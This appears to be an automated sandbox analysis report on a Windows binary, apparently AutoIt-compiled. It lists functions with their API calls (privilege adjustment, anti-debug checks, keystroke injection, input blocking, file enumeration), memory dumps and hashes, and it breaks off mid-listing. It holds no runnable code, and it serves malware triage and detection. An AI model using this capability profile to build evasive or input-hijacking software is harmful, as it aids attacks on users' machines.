                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E65CC1
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00E65D17
                                                        • FindClose.KERNEL32(?), ref: 00E65D5F
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 3541575487-0
                                                        • Opcode ID: 08573adaf625cec85785c514a91019db584584cea8848910d5c2ffa940279429
                                                        • Instruction ID: db064284380dcfc5daf93fd2ec47524e159d52fc8fb915d5302cedda1a995cfe
                                                        • Opcode Fuzzy Hash: 08573adaf625cec85785c514a91019db584584cea8848910d5c2ffa940279429
                                                        • Instruction Fuzzy Hash: D651AC35704A019FC714CF28D484A9AB7E4FF4A318F14855EE95A9B3A2CB30ED44CFA1
                                                        Function 00E22622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 00E2271A
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E22724
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00E22731
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                        • String ID:
                                                        • API String ID: 3906539128-0
                                                        • Opcode ID: 87a91ca2d3c056018d38766f442e67251b6eb8115a437d6dea9dd6d2359cbdf9
                                                        • Instruction ID: 439021705d56924201cb0809b39edef7e5d9e21b2ef21bb80f18897bb0dd595d
                                                        • Opcode Fuzzy Hash: 87a91ca2d3c056018d38766f442e67251b6eb8115a437d6dea9dd6d2359cbdf9
                                                        • Instruction Fuzzy Hash: 7731C474901228ABCB21DF64DC887D9B7B8AF08310F5051EAE51CA6260EB709F858F44
                                                        Function 00E651CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E651DA
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E65238
                                                        • SetErrorMode.KERNEL32(00000000), ref: 00E652A1
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
                                                        • Opcode ID: 7d9c2c8b257bc45e8663b9ed78750f1ab9ef2079dad21b5f53240d821a0cc094
                                                        • Instruction ID: ebd60f611516fd5c6a0575036228eb10d98164214f766134670de2dad8224b96
                                                        • Opcode Fuzzy Hash: 7d9c2c8b257bc45e8663b9ed78750f1ab9ef2079dad21b5f53240d821a0cc094
                                                        • Instruction Fuzzy Hash: 3A318035A00508DFDB00DF55D8D4EADBBB4FF49318F158099E905AB362CB31E859CB60
                                                        Function 00E516C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E0FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00E10668
                                                          • Part of subcall function 00E0FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00E10685
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E5170D
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E5173A
                                                        • GetLastError.KERNEL32 ref: 00E5174A
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                        • String ID:
                                                        • API String ID: 577356006-0
                                                        • Opcode ID: 6794e7cd2cf78e561af0fe0ea830f2f880f6296bd81497ac492f2acb00111cd0
                                                        • Instruction ID: 152bab80b8254974761a0416b5786b2df223686af0df421c0f0afe6ae9b08607
                                                        • Opcode Fuzzy Hash: 6794e7cd2cf78e561af0fe0ea830f2f880f6296bd81497ac492f2acb00111cd0
                                                        • Instruction Fuzzy Hash: 761101B2400304AFD7289F64EC86E6BB7F9EB45715B20856EE45663281EB70BC468B20
                                                        Function 00E5D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E5D608
                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00E5D645
                                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E5D650
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                        • String ID:
                                                        • API String ID: 33631002-0
                                                        • Opcode ID: 2bd30d77b0ce19a4b3f78bd615a316393faac8d9efc645498103031c3c0b9a34
                                                        • Instruction ID: 17cb64f1f5cb0dee4b01c65bf4b3b299fd76311ba0f41607277aa561aff8835b
                                                        • Opcode Fuzzy Hash: 2bd30d77b0ce19a4b3f78bd615a316393faac8d9efc645498103031c3c0b9a34
                                                        • Instruction Fuzzy Hash: 51115EB5E05228BFDB208F95DC45FAFBBBCEB45B50F108555F908F7290D6B04A058BA1
                                                        Function 00E51663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00E5168C
                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E516A1
                                                        • FreeSid.ADVAPI32(?), ref: 00E516B1
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        • Opcode ID: 24582de696c2bb363f25ff4081c302d6705cf66fe48d5c2f126c4d673381c888
                                                        • Instruction ID: 720869f03794c9fdfc686046b60a29bd758d45f8ff2c87628207fb46a26607ed
                                                        • Opcode Fuzzy Hash: 24582de696c2bb363f25ff4081c302d6705cf66fe48d5c2f126c4d673381c888
                                                        • Instruction Fuzzy Hash: 2FF04971940308FFDB00CFE09C89EAEBBBCEB04244F104460E500F2180D370AA089B60
                                                        Function 00E2C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: /
                                                        • API String ID: 0-2043925204
                                                        • Opcode ID: 8b30feb98faf276263d2703643a85a1c39a741536c264c4ceaedfd8052e8c9b2
                                                        • Instruction ID: c915c7455bc2eb30e0e1bb1c53fb503ab5224166a2f5bd98d644aa4c60d4f0ee
                                                        • Opcode Fuzzy Hash: 8b30feb98faf276263d2703643a85a1c39a741536c264c4ceaedfd8052e8c9b2
                                                        • Instruction Fuzzy Hash: 8F414D72500629AFCB20DFB9EC49DBF77B8EB84318F2046A9F915E7180E6309D41CB50
                                                        Function 00E4D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00E4D28C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID: X64
                                                        • API String ID: 2645101109-893830106
                                                        • Opcode ID: b390ab33c69d35ed752e24262610d6ed35fde93c0f49a502c3a61819b369fa25
                                                        • Instruction ID: 3761ede4adf614b9343b901e9a60b0b386216de3995e8912230b3c0d7aa58c0b
                                                        • Opcode Fuzzy Hash: b390ab33c69d35ed752e24262610d6ed35fde93c0f49a502c3a61819b369fa25
                                                        • Instruction Fuzzy Hash: 2BD0CAB480912DEFCB90CBA0EC88DDAB3BCBB04345F200292F10AB2140DB7096888F20
                                                        Function 00E668EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E66918
                                                        • FindClose.KERNEL32(00000000), ref: 00E66961
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 1dcc8d0e37f9960d31befb60e7f5c758e62bca755a670d8b91af2d3df074f939
                                                        • Instruction ID: 91f9842bfe4285a2035db8949f47144ca4f923a2f06767826d63174d116ed378
                                                        • Opcode Fuzzy Hash: 1dcc8d0e37f9960d31befb60e7f5c758e62bca755a670d8b91af2d3df074f939
                                                        • Instruction Fuzzy Hash: F411D0316146059FC710CF29D484A26BBE4FF85328F15C699E8699F3A2C730EC05CBA0
                                                        Function 00E637B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00E74891,?,?,00000035,?), ref: 00E637E4
                                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00E74891,?,?,00000035,?), ref: 00E637F4
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: f816bca819a63b065b3e924e3c43ecc2cd48b39af74f379645d3efc81d6baaab
                                                        • Instruction ID: 5730b35adca0a3587a15306b962c100963917b9c5c597bb930e439be61f6c6ea
                                                        • Opcode Fuzzy Hash: f816bca819a63b065b3e924e3c43ecc2cd48b39af74f379645d3efc81d6baaab
                                                        • Instruction Fuzzy Hash: 73F0E5B07042282AE72017B69C4DFEB7AAEEFC57A1F000166F509F2291D9709904C7B0
                                                        Function 00E5B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E5B25D
                                                        • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00E5B270
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: InputSendkeybd_event
                                                        • String ID:
                                                        • API String ID: 3536248340-0
                                                        • Opcode ID: 89d55a36577d263eab4b8bf340a8e0dd4fc69847687a52da0080e225ecd98ae5
                                                        • Instruction ID: 6efe6a9e8aeba194fb7296688ca90e66753057edef7caf6c8ab76334bb38375e
                                                        • Opcode Fuzzy Hash: 89d55a36577d263eab4b8bf340a8e0dd4fc69847687a52da0080e225ecd98ae5
                                                        • Instruction Fuzzy Hash: AAF06D7480424DAFDF058FA1C805BEE7BB4FF08309F10840AF955A51A1C37982059FA4
                                                        Function 00E510BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E511FC), ref: 00E510D4
                                                        • CloseHandle.KERNEL32(?,?,00E511FC), ref: 00E510E9
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: 0f6d3ee899b0e397c53002ddd75957a9a22659e94f150ab1af0a39aa344fa310
                                                        • Instruction ID: ec79beb538358c0018d988b66e1f00147b8e9d3fb6e9778fecb2ac9c4af8ba98
                                                        • Opcode Fuzzy Hash: 0f6d3ee899b0e397c53002ddd75957a9a22659e94f150ab1af0a39aa344fa310
                                                        • Instruction Fuzzy Hash: 28E04F32008600AEE7252B61FC05F7377E9EB04320F20882DF4A5904F1DB72ACE1DB60
                                                        Function 00E6EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • BlockInput.USER32(00000001), ref: 00E6EABD
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: BlockInput
                                                        • String ID:
                                                        • API String ID: 3456056419-0
                                                        • Opcode ID: d13b1062f2d0044ef691e79bae4b6f9a6c1ae6d25a308e6543ff0567d25ae337
                                                        • Instruction ID: c7e6e972084f29c6804f8bbd59628426cdd79ba79f668d49d0cb98423541beb8
                                                        • Opcode Fuzzy Hash: d13b1062f2d0044ef691e79bae4b6f9a6c1ae6d25a308e6543ff0567d25ae337
                                                        • Instruction Fuzzy Hash: B0E012352102049FC710DF59D444D9AF7D9EF987A0F118416FD49D7391D670A8408BA0
                                                        Function 00E109D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00E103EE), ref: 00E109DA
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 0b0a60690fe673752c6f0deb43762c774ee067967935fe5f63c311ddb3eabf92
                                                        • Instruction ID: 79ff7ee5388443f7f482f923a474e7537388f59b9ba26eb34570d93a2cf593bf
                                                        • Opcode Fuzzy Hash: 0b0a60690fe673752c6f0deb43762c774ee067967935fe5f63c311ddb3eabf92
                                                        • Instruction Fuzzy Hash:
                                                        Function 00E72ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00E72B30
                                                        • DeleteObject.GDI32(00000000), ref: 00E72B43
                                                        • DestroyWindow.USER32 ref: 00E72B52
                                                        • GetDesktopWindow.USER32 ref: 00E72B6D
                                                        • GetWindowRect.USER32(00000000), ref: 00E72B74
                                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00E72CA3
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00E72CB1
                                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E72CF8
                                                        • GetClientRect.USER32(00000000,?), ref: 00E72D04
                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E72D40
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E72D62
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E72D75
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E72D80
                                                        • GlobalLock.KERNEL32(00000000), ref: 00E72D89
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E72D98
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00E72DA1
                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E72DA8
                                                        • GlobalFree.KERNEL32(00000000), ref: 00E72DB3
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E72DC5
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E8FC38,00000000), ref: 00E72DDB
                                                        • GlobalFree.KERNEL32(00000000), ref: 00E72DEB
                                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00E72E11
                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00E72E30
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E72E52
                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E7303F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                        • API String ID: 2211948467-2373415609
                                                        • Opcode ID: 4e3f969f6ce48d8d392ce6f07a2c9bc7050b0169612077e1d9f517b0e02f9c6d
                                                        • Instruction ID: 3d914b4fb4314d029bfaa96622e920af3309f58630efa58f6f25177bb0010997
                                                        • Opcode Fuzzy Hash: 4e3f969f6ce48d8d392ce6f07a2c9bc7050b0169612077e1d9f517b0e02f9c6d
                                                        • Instruction Fuzzy Hash: DB02AD71A00208AFDB14DF65CC89EAE7BB9EF49714F108159FA19BB2A1C774ED05CB60
                                                        Function 00E870D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 00E8712F
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00E87160
                                                        • GetSysColor.USER32(0000000F), ref: 00E8716C
                                                        • SetBkColor.GDI32(?,000000FF), ref: 00E87186
                                                        • SelectObject.GDI32(?,?), ref: 00E87195
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00E871C0
